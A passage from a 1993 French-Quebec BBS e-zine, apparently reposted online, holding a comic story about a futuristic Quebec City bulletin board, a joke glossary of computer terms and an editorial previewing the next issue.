8>HEY! You don't know this is an ENGLISH story! If you talk in
9>French, people in other countries where NpShit is distributed
10>won't understand a word from what you said!
11>.
12>L'oGrE rUssE jR
13>
Message Commands: (C)ontinue (Q)uote (S)ave (A)bort: Save

{ This is a good job done. I hope he won't redo this stupid
mistake again..! }

Saving message...
Scanning for viruses...
Checking for message INTEGRITY, please wait...
Verifying English syntax...
Sending garbage for fun: þúþý
Message lost.
That's a joke.
Thanks for not suiciding yerself.

{ Argggghhhhh! This is a BIT long... Ah! I'll download the
last NpShit release! This way you'll see how xfers are
powerful in 3045! }

Uh-Oh, you're CHATTED by the SysOp Daniel Boudin Jr!

{ FUCK IT ALL!! }

Hi L'ogre Russe Jr., this is Daniel Boudin Jr.

salur

Hey! You have to speak in English!



qeus ta di jai pa comprit

Stupid Human Behavior! You're paid for being our official NpShit
supporter, so please can you WRITE IN ENGLISH?!?!


ign qes ta lodre ruse je cath pa se qe tu di

cls

Esti de moron, fais ESC au plus criss, chu dans une histoire
SERIEUSE!


a ok ma te chater taleur parse qe jai de qoi a demande

Ben oui ben oui ENVOYE!


cest ou le esc

Laisse faire m'a sortir moi-mˆme!!

þj-}a|þp¢¥
NO CARRIER

A/
CONNECT 658768483893

Welcome on

+---+ +---+ + +---+ +---+ +-+-+ + + + + +-+-+
| | | | | | | | | | Stop

Future BBS 1465.676.001 logon

Name : L'ogre Russe Jr.
Password: ******

Choose Language:

1 - English
2 - English
3 - English

Which language? 1

{ What a STUPID board program! It doesn't remembers the
language you use or what?? }

Welcome L'ogre Russe Jr. on Galactwit BBS.
You are the 785747894858th caller.
Press [Enter]

Grumaute Editorial 4783.89á (c)3045 by David Esturgeon from Bigoudeware
Sorry (c)CailStop

+-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + +
| | | | | | | | | | | | | | | | | |
| | | +-+ | | | | | | | +-+ | | | | |
| | | | | | | | | | | | | | | | | |
+ + + + + + + +-+ + + + +-+ + +-+ +-+

+-------+
| |\ | |
| | \ | | NpShit Support Area of Quebec City!!!!!!!
| | \| |
+-------+

(m)essage (f)ile (b)ulletin (!)logoff

Main menu (c)Caillou Chanceux Jr.

Your command: N

{ You will now enter the NpShit secret & private area!! WOW!
Wonderful! We will also download the latest release
available! }

--------------
NPSHIT SUPPORT
--------------

(D)ownload NpShit
(U)pload NpShit
(W)rite a PRIVATE letter to NpShit
(R)ead PUBLIC replies from NpShit
(-) Return to main menu

Ansi (c)Caillou Chanceux Jr.

Your command: D

Protocols:

(A * indicates 3-dimensional xfer available)

(X)modem
(Y)modem
Ymodem-(G)
(Z)modem
Zy(R)ion Jr
(H)S/Link Jr
* (F)uture Protocol

Protocol: Future Protocol

{ Future Protocol is the only protocol that doesn't ask for
the files to download before downloading! It is very great! }

* Now fetching protocol program, FileDort is ready to SEND! *

{ Well, That's dull. I should have choosen SuperZModem to
play Tetris while downloading. Ah! It's finished! It's
because we have 658768483893 bauds modems! }

Analyzing downloads...
Updating FILES.BBS...
Updating USERS.BBS...
Updating DOWNLOADS.DAT...
Updating SYSOP.DAT...
Updating NATACHA.GIF...
Checking for viruses...
There was a virus in one of your files!
Good luck!
Checking for file integrity...
Checking for text authors mental integrity...
Please wait...
Please wait...
Please wait...
Please wait...
Please wait...
874 error(s) found!

{ I think I'm going to go to bed... }

Perform another transfer now? (y/N): NOOOO!

Returning to BBS...

{ I really don't know what would be more dull than all
this... }

Uh-Oh, you're CHATTED by the SysOp Daniel Boudin Jr!

{ DO ANYONE HAVE A GUN????? }

Hi L'ogre Russe Jr., this is Daniel Boudin Jr.

salu

FUCK YA!


qoi

J'ai dit FUCK YA! FUCK YA FUCK YA FUCK YA catch-tu esti de cr‚tin?


tu ecrit tros vit je conpren pa

Hannnnn... Qu'est-ce que tu veux?


bin ony a des problaim abec vieu crouton

M‚phitso Jr?


oui il di qon est de la movaize propagand tk des mot jai pa comprit

Ah, c'est … cause de son texte qu'il uploade partout? Ben on va le
publier dans NpShit.


a ouin

Ben oui!


a bon

Bon peux-tu me laisser aller sur le bab?


ben jai pa trouver le esc encor

Cherche en haut … gauche du clavier?


non ya pa de esc ya rinqun trou avec pa de touche dedan ces mon
frere qi es partit avec jepensr


logr ruse

alo


alo

a non laise moi pa tousul mon frere vien de retrouve min esc


{ That night, L'ogre Russe have been found, dead, hanging a
gun. As you can see, in 3045, life isn't cute on Quebec
City's boards......

Surely because NpShit was still there. }

L'oGrE rUssE


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


Dictionnaire des niaiseries
courramment dites dans NpShit

par Paleolithic Parking Lot

Bon... Comme nous ne nous comprenons mˆme pas nous-mˆmes quand on
traduit des textes des revues anglaises, voici un dictionnaire que nous
nous sommes concoct‚s et o—, nous l'esp‚rons, nous pigerons souvent pour
avoir l'air plus brillants.

ACOUSTIC MODEM
Modem qui ne fonctionne pas … l'‚lectricit‚.
Syn: Modem sec Ant: Modem ‚lectrique

ACTIVITY LOG Terreur des leechers comme nous.

AMIGA Lire Ami Gars. Homme avec qui Dental Flush a des affinit‚s.
Voir FAIRY COMPOST.

ANSI (1) Sorte de dessin.
(2) Ajoutez un N au d‚but et c'est la premiŠre blonde …
Blitzcrest.
Rep: 2.

AUTOEXEC.BAT Batch file pour starter un char.

BASIC Langage ben trop compliqu‚ pour rien. D'ailleurs, le nom
le dit.

BATCH FILE Langage extrˆmement puissant utilis‚ par les Officiers
NpShit pour avoir l'air hot. Malheureusement on n'est pas
encore aussi hot que notre Dieu Loocif Hair... Mais ‡a va
venir!

BBS (1) Belle B‚belle Stupide.
(2) Concours … Val-B‚lair: the Best B-S.

BLITZCREST Ami de Dental Flush. Hahahaha!

BOARD Tann‚.

BREAK CHARACTER
CaractŠre cass‚.

BUS Absorber du liquide. Ex: Blitcrest a BUS tout mon jus
d'orange.

C (1) 3Šme lettre de l'alphabet.
(2) Ma note en programmation.

CARRIER (1) Endroit o— on trouve des pierres.
(2) Un g‚n‚rateur de poŠmes.

CHAT MODE Mode f‚line.

CHIP Sel et vinaigre.

COPY CON Commande pour faire des duplications de Blitzcrest.

DEFAULT On en a plein.

DEFAULT DRIVE Personne qui conduit trŠs mal.

DISQUE DUR Disquette qui fait du bruit quand vous l'‚chappez … terre.

DISQUE MOU Disquette en pƒte … modeler. N'existe pas.

DOORS Groupe de musique.

DOS Ce que vous avez en arriŠre du ventre.

DOWNLOAD Activit‚ pr‚f‚r‚e des Officiers NpShit.

EDIT Le nom de la blonde … Blitzcrest.

EDLIN Ex-blonde … Blitzcrest.

HARD DISK Avant.

FLOPPY DISK AprŠs.

FLOPPY DRIVE Conduite molle.

FLOW CONTROL Contr“le des naissances.

FORMAT Mot utilis‚ pour d‚signer certaines grosseurs. Ex: Ce pot
est de FORMAT 250 ml.

HANDLE Poign‚e.

HOT KEY Pratique en hiver pour les serrures gel‚es.

ID Ce que (c)Caillou Chanceux a … profusion pour ses ANSIs.

LAMER Mot interdit. C'est ‡a qui faut dire, hein Dental Flush?

LAMERZ Spa mieux!

ROM Capitale de l'Italie.

RAM Outil de propulsion marine manuelle.

LINE NOISE ATM2

MAC 3 premiŠres lettres du mot MacDonalds.

MEMORY LOCATION
Bail de 6 mois pour un usage temporaire de m‚moire.

MONITOR Ref. TERRAIN DE JEU.

MORON Secte religieuse fuck‚e. Stune gang de lamerZ! Oups, scuse
Dental Flush!

MOUSE Souris.

MOOSE Orignal.

OFF LINE Contraire de ligne ouverte. (Donc … guichet ferm‚)

OS/2 Le deuxiŠme os.

PAGE Composante d'un livre.

PASCAL Nom de l'ex-chum … Blitzcrest.

PC Plus Criss. Ex: Traduisez ce texte pour NpShit au PC.

POST Concurrent de Kellog's.

RECORD Piton situ‚ … cot‚ de PLAY.

ROOT DIRECTORY R‚pertoire o— se trouve la biŠre.

SCAN Quand est-ce. Ex: SCAN qu'on s'en va?

SERIAL PORT Port c‚r‚ale.

SHIFT KEY Cl‚ de changement de vitesse.

START BIT Aphrodisiaque.

STOP BIT Claude Ryan.

TERMINAL Type de phase.

TURNAROUND CHARACTER
Voir SRE.

UART Voir PIASSE RONDE.

UNIX Chais pas, probablement une ‚mission au Canal Famille.

USER (1) Qui a ‚t‚ beaucoup utilis‚.
(2) Mot auquel il manque un S au d‚but pour repr‚senter
ce que fait (c)Caillou Chanceux les week-ends.

VIDEO Voir MADONNA.

VIDEO MONITOR Responsable d'un terrain de jeux ‚lectronique.


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ


þ<JÉþþ@þÚj[9þ}EL€MCx¡þ’LÙg|rþIDcþ­®¹–†ýv~-¤¢.»YCþúþpAþ;³ »~þ«t=þŠþ"L

Tous ceux qui trouveront la signification de ce message cod‚ gagneront
un voyage en floride pour huit personnes, avec limousine, jet priv‚,
chambre d'h“tel 5 ‚toiles pouvant accueillir 12 personnes (pour une orgie
mettons) et 5000$ en argent de poche. (De poche, c'est mieux que de
Monopoly. (Ok, j'avoue que la joke est poche))


ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ




ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

IL Y A UN PETIT PEU DE NOUS AUTRES LA DEDANS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




LE MOT DE LA FIN

par
Blitzkreig

Ayoye! Je viens d'imprimer, en format Word Perfect (caractŠre par d‚faut)
NPC-004! J'ai l'impression que Merlin L'Emmerdeur va s'en prendre … nous
aprŠs ce num‚ro, parce que si tous les lecteurs de NPC impriment leur
copie, il va bien falloir coucher 3 ou 4 forˆts! Avez-vous vu l'‚paisseur
de la chose?
D'un autre c“t‚, nos d‚tracteurs ont raison: NPC est dangereux! En effet,
il s'agirait qu'un seul innocent se fasse frapper d'aplomb avec une copie
du #4 pour qu'il succombe … ses blessures!
Aidez-nous … ˆtre encore plus dangereux: faites-nous parvenir vos textes!


Le mois prochain, les suites promises sur Datapac, quifax, les out-dial
de VMB, un article sur la SPA, les smart drugs, les Unix, les Vax, Steve
Jackson Games, plus nos chroniques r‚guliŠres par Merlin L'Emmerdeur,
Santa Claus, et tous les autres! Un rapport circonstantiel sur le
d‚roulement du meeting 2600 … New-York! Et je ne vous parle pas des
surprises! (parce que moi-mˆme, je n'en ai aucune foutue id‚e...)

Laissez-nous un post sur nos BBS ou sur Internet, ou un message sur notre
VMB, pour nous dire comment vous avez aim‚ "la ride" ce mois-ci. Ou mieux
encore, ‚crivez-nous un mot song‚ si vous d‚sirez ˆtre publi‚s dans le
courrier du lecteur du num‚ro 5.

NPC-005 sortira le 25 mars! Courez d‚j… acheter votre rame de papier! Et
entretemps, venez lire PHUN WEEK ONLINE!


NPC RULES IN '93




ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

IL N'Y A PLUS DE SERVICE AU NUMERO QUE VOUS AVEZ COMPOSE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT